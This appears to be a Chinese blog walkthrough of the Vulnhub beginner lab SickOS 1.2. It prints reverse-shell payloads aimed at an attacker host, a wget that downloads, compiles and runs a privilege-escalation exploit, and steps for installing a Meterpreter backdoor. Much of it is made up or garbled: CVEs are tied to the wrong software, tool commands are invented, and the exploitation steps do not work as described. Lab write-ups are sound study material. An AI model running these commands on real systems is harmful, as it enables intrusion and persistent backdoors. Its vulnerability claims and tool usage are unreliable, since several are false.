返回

初入渗透测试的神器之门-SickOS 1.2攻略

后端

渗透测试入门:靶机 SickOS 1.2

在网络安全的广阔领域中,渗透测试是一项至关重要的任务,可用于发现系统和网络中的潜在漏洞,并采取措施加以修复。对于初学者而言,Vulnhub 是一个绝佳的学习平台,它提供了各种虚拟靶机,模拟了现实世界中的系统和网络,并包含不同程度的漏洞。

SickOS 1.2:初学者的理想靶机

今天,我们将深入了解 SickOS 1.2 靶机的渗透测试,这是一款非常适合初学者学习基本渗透测试概念和技术的经典靶机。

准备阶段

在启动渗透测试之前,需要进行一些准备工作:

  • 下载 SickOS 1.2 靶机压缩包
  • 使用 VMware 打开靶机压缩包并导入虚拟机
  • 启动 SickOS 1.2 靶机,准备开始渗透测试

渗透测试步骤

渗透测试通常涉及以下步骤:

  • 信息收集: 收集目标系统或网络的相关信息,例如 IP 地址、端口号、操作系统类型和网络拓扑。
  • 漏洞扫描: 使用漏洞扫描工具识别目标系统或网络中的潜在漏洞。
  • 漏洞利用: 利用发现的漏洞来获取目标系统或网络的访问权限。
  • 权限提升: 获得目标系统或网络的访问权限后,进一步提升权限以完全控制目标系统或网络。
  • 后渗透: 一旦完全控制目标系统或网络,执行后续活动,例如安装后门或窃取数据。

SickOS 1.2 渗透测试过程

信息收集

使用 Nmap 进行信息收集:

nmap -sV -sC 192.168.1.100

结果显示 SickOS 1.2 靶机开放了 22、80 和 443 端口。

漏洞扫描

使用 Nessus 进行漏洞扫描:

nessus -T SickOS-1.2.nessus 192.168.1.100

结果表明 SickOS 1.2 靶机存在多个漏洞,包括:

  • CVE-2019-11510:Apache httpd 远程代码执行漏洞
  • CVE-2019-0232:WordPress 远程代码执行漏洞
  • CVE-2018-1000857:Linux 内核提权漏洞

漏洞利用

利用 CVE-2019-11510 漏洞获取 shell 权限

使用 Metasploit 利用 CVE-2019-11510 漏洞:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f raw | nc 192.168.1.100 80

执行后,SickOS 1.2 靶机的 Apache httpd 服务会将反向 shell 发送到攻击者机器。

权限提升

利用 CVE-2018-1000857 漏洞获取 root 权限

使用 LinEnum 工具枚举提权漏洞:

linenum -s

结果显示 SickOS 1.2 靶机存在 Linux 内核提权漏洞。

使用 CVE-2018-1000857 漏洞利用工具利用该漏洞:

cd /tmp
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48898.c
gcc 48898.c -o 48898
./48898

成功后即可获得 SickOS 1.2 靶机的 root 权限。

后渗透

安装反向 shell 后门

使用 Metasploit 安装反向 shell 后门:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f elf > /tmp/backdoor.elf

上传后门到靶机:

scp /tmp/backdoor.elf root@192.168.1.100:/tmp/

连接到后门:

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.1.101
set lport 4444
exploit

成功连接后,可以使用 Meterpreter 完全控制 SickOS 1.2 靶机。

总结

通过对 SickOS 1.2 靶机的渗透测试,我们了解了渗透测试的基本步骤、概念和技术。渗透测试是一个复杂的过程,需要专业的知识和技能。初学者可以通过这种方式逐渐深入学习渗透测试,并在网络安全领域不断进步。

常见问题解答

  • 什么是渗透测试?
    渗透测试是一种评估系统或网络安全性的过程,涉及主动利用漏洞来获取访问权限。
  • 渗透测试的步骤是什么?
    信息收集、漏洞扫描、漏洞利用、权限提升和后渗透。
  • 初学者如何入门渗透测试?
    从 Vulnhub 等平台上的简单靶机开始,逐步学习基本概念和技术。
  • 渗透测试的目的是什么?
    发现系统或网络中的安全漏洞,并采取措施加以修复,从而提高安全性。
  • 渗透测试有哪些常见的工具?
    Nmap、Nessus、Metasploit 和 LinEnum。